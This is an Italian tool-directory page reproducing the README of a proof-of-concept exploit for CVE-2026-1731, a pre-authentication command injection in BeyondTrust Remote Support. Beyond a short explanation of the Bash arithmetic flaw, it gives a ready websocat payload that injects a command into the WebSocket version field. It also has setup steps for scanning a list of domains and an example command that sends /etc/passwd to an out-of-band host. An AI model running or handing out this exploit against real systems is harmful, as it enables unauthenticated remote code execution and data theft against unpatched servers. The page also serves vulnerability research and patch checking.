Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/win3zz/cve-2026-1731
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubwin3zz/cve-2026-1731

CVE-2026-1731

CVE-2026-1731 - Vulnerabilità critica di iniezione di comandi in BeyondTrust Remote Support e Privileged Remote Access dovuta a una valutazione aritmetica di Bash non sicura in uno script raggiungibile via WebSocket.

Vedi Repository
35847 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-1731 BeyondTrust Remote Support PoC RCE pre-autenticazione

[!WARNING] Questo script è inteso esclusivamente a scopo didattico e di ricerca. Non utilizzarlo su sistemi senza autorizzazione esplicita. L'accesso o i test non autorizzati sono illegali e non etici. Leggi il DISCLAIMER completo prima di usare questo script.

Panoramica

Questo script dimostra una vulnerabilità critica di command injection (CVE-2026-1731) che colpisce BeyondTrust Remote Support (RS) e Privileged Remote Access (PRA). Il problema origina dallo stesso endpoint raggiungibile via WebSocket coinvolto nella precedente e nota CVE-2024-12356, rendendo questa una variante strettamente correlata.

La vulnerabilità esiste perché lo script thin-scc-wrapper del server esegue confronti aritmetici su input controllati dall'attaccante, in particolare sul valore remoteVersion inviato durante l'handshake WebSocket. Bash tratta gli operandi nei confronti numerici come espressioni, non come semplici stringhe, consentendo a payload costruiti come a[$(cmd)]0 di innescare esecuzione arbitraria di comandi durante la valutazione.

Anche se BeyondTrust ha aggiunto un controllo numerico di sanità in questo ciclo di patch, ciò non impedisce a Bash di eseguire successivamente la valutazione delle espressioni, lasciando l'endpoint sfruttabile. Gli attaccanti possono ottenere l'esecuzione di codice semplicemente aprendo una connessione WebSocket e inviando un valore di versione malizioso prima dell'autenticazione.

Payload

root@kitploit:~
echo -ne "hax[\$(ATTACKER-COMMAND)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | \
./websocat -k wss://AFFECTED-SYSTEM:443/nw \
--protocol "ingredi support desk customer thin" \
-H "X-Ns-Company: COMPANY-NAME" \
--binary -n -

Dipendenze

root@kitploit:~
pip3 install requests

Scarica websocat

root@kitploit:~
wget -O websocat https://github.com/vi/websocat/releases/download/v1.14.1/websocat.x86_64-unknown-linux-musl
chmod +x websocat

(Mettilo nella stessa cartella del tuo script Python.)

Oppure spostalo a livello di sistema:

root@kitploit:~
sudo mv websocat /usr/local/bin/

Crea domains.txt nella stessa directory

Aggiungi gli URL che vuoi testare:

root@kitploit:~
example1.com
example2.com
example3.com

Utilizzo dello script

Modifica la seguente riga nello script per configurare il comando che vuoi che l'exploit WebSocket esegua:

root@kitploit:~
CMD = "YOUR-COMMAND-HERE"

Ad esempio:

root@kitploit:~
CMD = "curl -X POST -d @/etc/passwd http://XXXXXXXXX.oast.fun/"

Una volta impostato il comando, esegui lo script:

root@kitploit:~
python3 exploit.py

Oppure rendilo eseguibile ed eseguilo direttamente:

root@kitploit:~
chmod +x exploit.py
./exploit.py
1
2

Mitigazione

  • https://www.beyondtrust.com/trust-center/security-advisories/bt26-02

Riferimenti

  • Analisi originale - https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis
Scarica lo strumento